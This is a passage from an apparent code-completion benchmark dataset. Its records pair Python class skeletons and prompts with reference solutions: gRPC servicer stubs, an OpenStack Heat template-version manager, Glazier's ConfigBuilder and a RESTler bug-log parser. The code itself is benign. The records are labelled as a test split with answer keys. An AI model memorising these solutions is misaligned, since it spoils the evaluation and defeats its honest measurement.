implemented!')\n<|end_body_1|>\n\n<|body_start_2|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise 
NotImplementedError('Method not implemented!')\n<|end_body_2|>\n\n<|body_start_3|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_3|>\n", "revision_id": "dc1ea0b58f92429ec8e7b54a8f23525abe024ba9", "skeleton": "<|skeleton|>\nclass AgentProfileServiceServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def createAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_0|>\n\n def updateAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_1|>\n\n def deleteAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_2|>\n\n def getAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AgentProfileServiceServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def createAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def updateAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def deleteAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def getAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n", "source": "the_stack_v2_python_sparse", "source_path": "custos-client-sdks/custos-python-sdk/build/lib/custos/server/core/AgentProfileService_pb2_grpc.py", "source_repo": "apache/airavata-custos", "split": "test", "star_events_count": 12} {"blob_id": "4750b8551d1ecc2f703d6842c0e0e3949bd8549b", "bodies": ["url = '/template_versions'\nif response_key:\n return self._get(url, 'template_versions', **kwargs)\nelse:\n return self._get(url, **kwargs)", "url = '/template_versions/%s/functions' % template_version\nif response_key:\n return self._get(url, 'template_functions', **kwargs)\nelse:\n return self._get(url, **kwargs)"], "bodies_text": "<|body_start_0|>\n url = '/template_versions'\n if response_key:\n return self._get(url, 'template_versions', **kwargs)\n else:\n return self._get(url, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n url = '/template_versions/%s/functions' % template_version\n if response_key:\n return self._get(url, 'template_functions', **kwargs)\n else:\n return self._get(url, **kwargs)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "TemplateVersionManager", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TemplateVersionManager:\n\n def list(self, 
response_key=True, **kwargs):\n \"\"\"Get a list of template versions. :rtype: list of :class:`TemplateVersion`\"\"\"\n <|body_0|>\n\n def get(self, template_version, response_key=True, **kwargs):\n \"\"\"Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n url = '/template_versions'\n if response_key:\n return self._get(url, 'template_versions', **kwargs)\n else:\n return self._get(url, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n url = '/template_versions/%s/functions' % template_version\n if response_key:\n return self._get(url, 'template_functions', **kwargs)\n else:\n return self._get(url, **kwargs)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000386", "length_bytes": 874, "license_type": "no_license", "methods": [{"docstring": "Get a list of template versions. :rtype: list of :class:`TemplateVersion`", "name": "list", "signature": "def list(self, response_key=True, **kwargs)"}, {"docstring": "Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for", "name": "get", "signature": "def get(self, template_version, response_key=True, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006421", "prompt": "Implement the Python class `TemplateVersionManager` described below.\n\nClass description:\nImplement the TemplateVersionManager class.\n\nMethod signatures and docstrings:\n- def list(self, response_key=True, **kwargs): Get a list of template versions. :rtype: list of :class:`TemplateVersion`\n- def get(self, template_version, response_key=True, **kwargs): Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for", "prompted_full_text": "Implement the Python class `TemplateVersionManager` described below.\n\nClass description:\nImplement the TemplateVersionManager class.\n\nMethod signatures and docstrings:\n- def list(self, response_key=True, **kwargs): Get a list of template versions. :rtype: list of :class:`TemplateVersion`\n- def get(self, template_version, response_key=True, **kwargs): Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for\n\n<|skeleton|>\nclass TemplateVersionManager:\n\n def list(self, response_key=True, **kwargs):\n \"\"\"Get a list of template versions. :rtype: list of :class:`TemplateVersion`\"\"\"\n <|body_0|>\n\n def get(self, template_version, response_key=True, **kwargs):\n \"\"\"Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n url = '/template_versions'\n if response_key:\n return self._get(url, 'template_versions', **kwargs)\n else:\n return self._get(url, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n url = '/template_versions/%s/functions' % template_version\n if response_key:\n return self._get(url, 'template_functions', **kwargs)\n else:\n return self._get(url, **kwargs)\n<|end_body_1|>\n", "revision_id": "42f9197ba26ffb6b9dd336a524639ecbbf194365", "skeleton": "<|skeleton|>\nclass TemplateVersionManager:\n\n def list(self, response_key=True, **kwargs):\n \"\"\"Get a list of template versions. 
:rtype: list of :class:`TemplateVersion`\"\"\"\n <|body_0|>\n\n def get(self, template_version, response_key=True, **kwargs):\n \"\"\"Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TemplateVersionManager:\n def list(self, response_key=True, **kwargs):\n \"\"\"Get a list of template versions. :rtype: list of :class:`TemplateVersion`\"\"\"\n url = '/template_versions'\n if response_key:\n return self._get(url, 'template_versions', **kwargs)\n else:\n return self._get(url, **kwargs)\n\n def get(self, template_version, response_key=True, **kwargs):\n \"\"\"Get a list of functions for a specific resource_type. :param template_version: template version to get the functions for\"\"\"\n url = '/template_versions/%s/functions' % template_version\n if response_key:\n return self._get(url, 'template_functions', **kwargs)\n else:\n return self._get(url, **kwargs)\n", "source": "the_stack_v2_python_sparse", "source_path": "ops_client/project/heat/template_versions.py", "source_repo": "tokuzfunpi/ops_client", "split": "test", "star_events_count": 0} {"blob_id": "f8e08dd6d52334332dcaaee8fca3fe55309bf68c", "bodies": ["self._task_list = []\nwhile True:\n try:\n self._Start(in_path, in_file)\n break\n except actions.ServerChangeEvent:\n in_path = ''\ntry:\n files.Dump(out_file, self._task_list, mode='a')\nexcept files.Error as e:\n raise ConfigBuilderError() from e", "self._build_info.ActiveConfigPath(append=conf_path.rstrip('/'))\ntry:\n path = download.PathCompile(self._build_info, file_name=conf_file)\n yaml_config = files.Read(path)\nexcept (files.Error, buildinfo.Error) as e:\n raise ConfigBuilderError() from e\ntimer_start = 'start_{}_{}'.format(conf_path.rstrip('/'), conf_file)\nactive_path = copy.deepcopy(self._build_info.ActiveConfigPath())\nself._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_start]}})\ncontrols = yaml_config['controls']\ntry:\n for control in controls:\n if 'pin' not in control or self._MatchPin(control['pin']):\n self._StoreControls(control, yaml_config.get('templates'))\nfinally:\n timer_stop = 'stop_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_stop]}})\nself._build_info.ActiveConfigPath(pop=True)", "for pin in pins:\n try:\n if not self._build_info.BuildPinMatch(pin, pins[pin]):\n return False\n except buildinfo.Error as e:\n raise SysInfoError() from e\nreturn True", "for element in control:\n if element == 'pin':\n continue\n elif element == 'template':\n for template in control['template']:\n self._StoreControls(templates[template], templates)\n elif element == 'include':\n for sub_inc in control['include']:\n self._Start(conf_path=sub_inc[0], conf_file=sub_inc[1])\n elif element in _ALLOW_IN_CONTROL:\n if self._IsRealtimeAction(element, control[element]):\n self._ProcessAction(element, control[element])\n else:\n self._task_list.append({'path': copy.deepcopy(self._build_info.ActiveConfigPath()), 'data': {element: control[element]}})\n else:\n raise UnknownActionError(str(element))"], "bodies_text": "<|body_start_0|>\n self._task_list = []\n while True:\n try:\n self._Start(in_path, in_file)\n break\n except actions.ServerChangeEvent:\n in_path = ''\n try:\n files.Dump(out_file, self._task_list, mode='a')\n except files.Error as e:\n raise 
ConfigBuilderError() from e\n<|end_body_0|>\n\n<|body_start_1|>\n self._build_info.ActiveConfigPath(append=conf_path.rstrip('/'))\n try:\n path = download.PathCompile(self._build_info, file_name=conf_file)\n yaml_config = files.Read(path)\n except (files.Error, buildinfo.Error) as e:\n raise ConfigBuilderError() from e\n timer_start = 'start_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n active_path = copy.deepcopy(self._build_info.ActiveConfigPath())\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_start]}})\n controls = yaml_config['controls']\n try:\n for control in controls:\n if 'pin' not in control or self._MatchPin(control['pin']):\n self._StoreControls(control, yaml_config.get('templates'))\n finally:\n timer_stop = 'stop_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_stop]}})\n self._build_info.ActiveConfigPath(pop=True)\n<|end_body_1|>\n\n<|body_start_2|>\n for pin in pins:\n try:\n if not self._build_info.BuildPinMatch(pin, pins[pin]):\n return False\n except buildinfo.Error as e:\n raise SysInfoError() from e\n return True\n<|end_body_2|>\n\n<|body_start_3|>\n for element in control:\n if element == 'pin':\n continue\n elif element == 'template':\n for template in control['template']:\n self._StoreControls(templates[template], templates)\n elif element == 'include':\n for sub_inc in control['include']:\n self._Start(conf_path=sub_inc[0], conf_file=sub_inc[1])\n elif element in _ALLOW_IN_CONTROL:\n if self._IsRealtimeAction(element, control[element]):\n self._ProcessAction(element, control[element])\n else:\n self._task_list.append({'path': copy.deepcopy(self._build_info.ActiveConfigPath()), 'data': {element: control[element]}})\n else:\n raise UnknownActionError(str(element))\n<|end_body_3|>\n", "class_docstring": "Builds the complete task list for the installation.", "class_name": "ConfigBuilder", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ConfigBuilder:\n \"\"\"Builds the complete task list for the installation.\"\"\"\n\n def Start(self, out_file, in_path, in_file='build.yaml'):\n \"\"\"Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.\"\"\"\n <|body_0|>\n\n def _Start(self, conf_path, conf_file):\n \"\"\"Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.\"\"\"\n <|body_1|>\n\n def _MatchPin(self, pins):\n \"\"\"Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.\"\"\"\n <|body_2|>\n\n def _StoreControls(self, control, templates):\n \"\"\"Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. 
templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._task_list = []\n while True:\n try:\n self._Start(in_path, in_file)\n break\n except actions.ServerChangeEvent:\n in_path = ''\n try:\n files.Dump(out_file, self._task_list, mode='a')\n except files.Error as e:\n raise ConfigBuilderError() from e\n<|end_body_0|>\n\n<|body_start_1|>\n self._build_info.ActiveConfigPath(append=conf_path.rstrip('/'))\n try:\n path = download.PathCompile(self._build_info, file_name=conf_file)\n yaml_config = files.Read(path)\n except (files.Error, buildinfo.Error) as e:\n raise ConfigBuilderError() from e\n timer_start = 'start_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n active_path = copy.deepcopy(self._build_info.ActiveConfigPath())\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_start]}})\n controls = yaml_config['controls']\n try:\n for control in controls:\n if 'pin' not in control or self._MatchPin(control['pin']):\n self._StoreControls(control, yaml_config.get('templates'))\n finally:\n timer_stop = 'stop_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_stop]}})\n self._build_info.ActiveConfigPath(pop=True)\n<|end_body_1|>\n\n<|body_start_2|>\n for pin in pins:\n try:\n if not self._build_info.BuildPinMatch(pin, pins[pin]):\n return False\n except buildinfo.Error as e:\n raise SysInfoError() from e\n return True\n<|end_body_2|>\n\n<|body_start_3|>\n for element in control:\n if element == 'pin':\n continue\n elif element == 'template':\n for template in control['template']:\n self._StoreControls(templates[template], templates)\n elif element == 'include':\n for sub_inc in control['include']:\n self._Start(conf_path=sub_inc[0], conf_file=sub_inc[1])\n elif element in _ALLOW_IN_CONTROL:\n if self._IsRealtimeAction(element, control[element]):\n self._ProcessAction(element, control[element])\n else:\n self._task_list.append({'path': copy.deepcopy(self._build_info.ActiveConfigPath()), 'data': {element: control[element]}})\n else:\n raise UnknownActionError(str(element))\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000387", "length_bytes": 7079, "license_type": "permissive", "methods": [{"docstring": "Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.", "name": "Start", "signature": "def Start(self, out_file, in_path, in_file='build.yaml')"}, {"docstring": "Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.", "name": "_Start", "signature": "def _Start(self, conf_path, conf_file)"}, {"docstring": "Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. 
False if the host fails a match.", "name": "_MatchPin", "signature": "def _MatchPin(self, pins)"}, {"docstring": "Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.", "name": "_StoreControls", "signature": "def _StoreControls(self, control, templates)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_005082", "prompt": "Implement the Python class `ConfigBuilder` described below.\n\nClass description:\nBuilds the complete task list for the installation.\n\nMethod signatures and docstrings:\n- def Start(self, out_file, in_path, in_file='build.yaml'): Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.\n- def _Start(self, conf_path, conf_file): Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.\n- def _MatchPin(self, pins): Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.\n- def _StoreControls(self, control, templates): Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.", "prompted_full_text": "Implement the Python class `ConfigBuilder` described below.\n\nClass description:\nBuilds the complete task list for the installation.\n\nMethod signatures and docstrings:\n- def Start(self, out_file, in_path, in_file='build.yaml'): Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.\n- def _Start(self, conf_path, conf_file): Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.\n- def _MatchPin(self, pins): Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.\n- def _StoreControls(self, control, templates): Process all of the possible sub-sections of a main control section. 
Args: control: The data from this control subsection. templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.\n\n<|skeleton|>\nclass ConfigBuilder:\n \"\"\"Builds the complete task list for the installation.\"\"\"\n\n def Start(self, out_file, in_path, in_file='build.yaml'):\n \"\"\"Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.\"\"\"\n <|body_0|>\n\n def _Start(self, conf_path, conf_file):\n \"\"\"Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.\"\"\"\n <|body_1|>\n\n def _MatchPin(self, pins):\n \"\"\"Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.\"\"\"\n <|body_2|>\n\n def _StoreControls(self, control, templates):\n \"\"\"Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._task_list = []\n while True:\n try:\n self._Start(in_path, in_file)\n break\n except actions.ServerChangeEvent:\n in_path = ''\n try:\n files.Dump(out_file, self._task_list, mode='a')\n except files.Error as e:\n raise ConfigBuilderError() from e\n<|end_body_0|>\n\n<|body_start_1|>\n self._build_info.ActiveConfigPath(append=conf_path.rstrip('/'))\n try:\n path = download.PathCompile(self._build_info, file_name=conf_file)\n yaml_config = files.Read(path)\n except (files.Error, buildinfo.Error) as e:\n raise ConfigBuilderError() from e\n timer_start = 'start_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n active_path = copy.deepcopy(self._build_info.ActiveConfigPath())\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_start]}})\n controls = yaml_config['controls']\n try:\n for control in controls:\n if 'pin' not in control or self._MatchPin(control['pin']):\n self._StoreControls(control, yaml_config.get('templates'))\n finally:\n timer_stop = 'stop_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_stop]}})\n self._build_info.ActiveConfigPath(pop=True)\n<|end_body_1|>\n\n<|body_start_2|>\n for pin in pins:\n try:\n if not self._build_info.BuildPinMatch(pin, pins[pin]):\n return False\n except buildinfo.Error as e:\n raise SysInfoError() from e\n return True\n<|end_body_2|>\n\n<|body_start_3|>\n for element in control:\n if element == 'pin':\n continue\n elif element == 'template':\n for template in control['template']:\n self._StoreControls(templates[template], templates)\n elif element == 'include':\n for sub_inc in control['include']:\n self._Start(conf_path=sub_inc[0], 
conf_file=sub_inc[1])\n elif element in _ALLOW_IN_CONTROL:\n if self._IsRealtimeAction(element, control[element]):\n self._ProcessAction(element, control[element])\n else:\n self._task_list.append({'path': copy.deepcopy(self._build_info.ActiveConfigPath()), 'data': {element: control[element]}})\n else:\n raise UnknownActionError(str(element))\n<|end_body_3|>\n", "revision_id": "ec44cb163f54d1393b0a2c2730d5d0d9d0fc8515", "skeleton": "<|skeleton|>\nclass ConfigBuilder:\n \"\"\"Builds the complete task list for the installation.\"\"\"\n\n def Start(self, out_file, in_path, in_file='build.yaml'):\n \"\"\"Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.\"\"\"\n <|body_0|>\n\n def _Start(self, conf_path, conf_file):\n \"\"\"Pull and process a config file. Args: conf_path: The path to the config below root. conf_file: A named config file, normally build.yaml.\"\"\"\n <|body_1|>\n\n def _MatchPin(self, pins):\n \"\"\"Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.\"\"\"\n <|body_2|>\n\n def _StoreControls(self, control, templates):\n \"\"\"Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. templates: Any templates declared in the current config. Raises: UnknownActionError: Attempt to process an unknown command element.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ConfigBuilder:\n \"\"\"Builds the complete task list for the installation.\"\"\"\n\n def Start(self, out_file, in_path, in_file='build.yaml'):\n \"\"\"Start parsing configuration files. Args: out_file: The location to store the compiled config data. in_path: The path to the root configuration file. in_file: The root configuration file name.\"\"\"\n self._task_list = []\n while True:\n try:\n self._Start(in_path, in_file)\n break\n except actions.ServerChangeEvent:\n in_path = ''\n try:\n files.Dump(out_file, self._task_list, mode='a')\n except files.Error as e:\n raise ConfigBuilderError() from e\n\n def _Start(self, conf_path, conf_file):\n \"\"\"Pull and process a config file. Args: conf_path: The path to the config below root. 
conf_file: A named config file, normally build.yaml.\"\"\"\n self._build_info.ActiveConfigPath(append=conf_path.rstrip('/'))\n try:\n path = download.PathCompile(self._build_info, file_name=conf_file)\n yaml_config = files.Read(path)\n except (files.Error, buildinfo.Error) as e:\n raise ConfigBuilderError() from e\n timer_start = 'start_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n active_path = copy.deepcopy(self._build_info.ActiveConfigPath())\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_start]}})\n controls = yaml_config['controls']\n try:\n for control in controls:\n if 'pin' not in control or self._MatchPin(control['pin']):\n self._StoreControls(control, yaml_config.get('templates'))\n finally:\n timer_stop = 'stop_{}_{}'.format(conf_path.rstrip('/'), conf_file)\n self._task_list.append({'path': active_path, 'data': {'SetTimer': [timer_stop]}})\n self._build_info.ActiveConfigPath(pop=True)\n\n def _MatchPin(self, pins):\n \"\"\"Check all pin entries for a mismatch. Pins can mismatch either by the matching setting being omitted or by matching an exclusion (!). Example: pins: ['os', ['win7', 'win8']] * Will match os = win7 or os = win8. * Will fail to match os = '2012r2'. * Will match model = 'vmware' (because model is not pinned). Example 2: pins: ['os', ['!win7']] * Will match os = win8 or os = 2012r2. * Will fail to match os = 'win7'. * Will match model = 'vmware' (because model is not pinned). Args: pins: a list of all applicable pin names and acceptable values Returns: True if this host passes all pin checks. False if the host fails a match.\"\"\"\n for pin in pins:\n try:\n if not self._build_info.BuildPinMatch(pin, pins[pin]):\n return False\n except buildinfo.Error as e:\n raise SysInfoError() from e\n return True\n\n def _StoreControls(self, control, templates):\n \"\"\"Process all of the possible sub-sections of a main control section. Args: control: The data from this control subsection. templates: Any templates declared in the current config. 
Raises: UnknownActionError: Attempt to process an unknown command element.\"\"\"\n for element in control:\n if element == 'pin':\n continue\n elif element == 'template':\n for template in control['template']:\n self._StoreControls(templates[template], templates)\n elif element == 'include':\n for sub_inc in control['include']:\n self._Start(conf_path=sub_inc[0], conf_file=sub_inc[1])\n elif element in _ALLOW_IN_CONTROL:\n if self._IsRealtimeAction(element, control[element]):\n self._ProcessAction(element, control[element])\n else:\n self._task_list.append({'path': copy.deepcopy(self._build_info.ActiveConfigPath()), 'data': {element: control[element]}})\n else:\n raise UnknownActionError(str(element))\n", "source": "the_stack_v2_python_sparse", "source_path": "glazier/lib/config/builder.py", "source_repo": "google/glazier", "split": "test", "star_events_count": 1311} {"blob_id": "48505463af0fc4fa9e477daae3a01830a30ac4e2", "bodies": ["super().__init__(path)\nself._bug_list = dict()\nself._parse()", "if self._bug_list != other._bug_list:\n print('Bug lists do not match.')\n return False\nreturn True", "with open(self._path, 'r') as file:\n try:\n line = file.readline()\n while line:\n if line.startswith(BUG_START):\n line = file.readline()\n if line:\n bug_type = line.split(' ', 1)[0]\n if bug_type not in self._bug_list:\n self._bug_list[bug_type] = []\n reproduced = 'Bug was reproduced' in line\n line = file.readline()\n if line.startswith('Attempted'):\n line = file.readline()\n bug_hash = line.split(' ')[-1].rstrip()\n line = file.readline()\n seq = ParsedSequence([])\n while line and (not line.startswith(BUG_START)):\n seq += self._get_request(line)\n line = file.readline()\n self._bug_list[bug_type].append((seq, reproduced, bug_hash))\n else:\n line = file.readline()\n except Exception as err:\n print(f'Failed to read bug log. Log was not a complete test log.\\n{err!s}')\n raise TestFailedException"], "bodies_text": "<|body_start_0|>\n super().__init__(path)\n self._bug_list = dict()\n self._parse()\n<|end_body_0|>\n\n<|body_start_1|>\n if self._bug_list != other._bug_list:\n print('Bug lists do not match.')\n return False\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n with open(self._path, 'r') as file:\n try:\n line = file.readline()\n while line:\n if line.startswith(BUG_START):\n line = file.readline()\n if line:\n bug_type = line.split(' ', 1)[0]\n if bug_type not in self._bug_list:\n self._bug_list[bug_type] = []\n reproduced = 'Bug was reproduced' in line\n line = file.readline()\n if line.startswith('Attempted'):\n line = file.readline()\n bug_hash = line.split(' ')[-1].rstrip()\n line = file.readline()\n seq = ParsedSequence([])\n while line and (not line.startswith(BUG_START)):\n seq += self._get_request(line)\n line = file.readline()\n self._bug_list[bug_type].append((seq, reproduced, bug_hash))\n else:\n line = file.readline()\n except Exception as err:\n print(f'Failed to read bug log. 
Log was not a complete test log.\\n{err!s}')\n raise TestFailedException\n<|end_body_2|>\n", "class_docstring": "Responsible for parsing bug bucket logs", "class_name": "BugLogParser", "detected_licenses": ["LicenseRef-scancode-generic-cla", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BugLogParser:\n \"\"\"Responsible for parsing bug bucket logs\"\"\"\n\n def __init__(self, path):\n \"\"\"BugLogParser constructor @param path: The path to the bug log file @type path: Str\"\"\"\n <|body_0|>\n\n def diff_log(self, other):\n \"\"\"Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool\"\"\"\n <|body_1|>\n\n def _parse(self):\n \"\"\"Parses the bug log to populate the bug list @return: None @rtype : None\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(path)\n self._bug_list = dict()\n self._parse()\n<|end_body_0|>\n\n<|body_start_1|>\n if self._bug_list != other._bug_list:\n print('Bug lists do not match.')\n return False\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n with open(self._path, 'r') as file:\n try:\n line = file.readline()\n while line:\n if line.startswith(BUG_START):\n line = file.readline()\n if line:\n bug_type = line.split(' ', 1)[0]\n if bug_type not in self._bug_list:\n self._bug_list[bug_type] = []\n reproduced = 'Bug was reproduced' in line\n line = file.readline()\n if line.startswith('Attempted'):\n line = file.readline()\n bug_hash = line.split(' ')[-1].rstrip()\n line = file.readline()\n seq = ParsedSequence([])\n while line and (not line.startswith(BUG_START)):\n seq += self._get_request(line)\n line = file.readline()\n self._bug_list[bug_type].append((seq, reproduced, bug_hash))\n else:\n line = file.readline()\n except Exception as err:\n print(f'Failed to read bug log. 
Log was not a complete test log.\\n{err!s}')\n raise TestFailedException\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000388", "length_bytes": 9641, "license_type": "permissive", "methods": [{"docstring": "BugLogParser constructor @param path: The path to the bug log file @type path: Str", "name": "__init__", "signature": "def __init__(self, path)"}, {"docstring": "Diffs a BugLogParser's bug list with this object's bug list @param other: The parser to compare to this one @type other: BugLogParser @return: True if the bug lists match @rtype : Bool", "name": "diff_log", "signature": "def diff_log(self, other)"}, {"docstring": "Parses the bug log to populate the bug list @return: None @rtype : None", "name": "_parse", "signature": "def _parse(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005731", "prompt": "Implement the Python class `BugLogParser` described below.\n\nClass description:\nResponsible for parsing bug bucket logs\n\nMethod signatures and docstrings:\n- def __init__(self, path): BugLogParser constructor @param path: The path to the bug log file @type path: 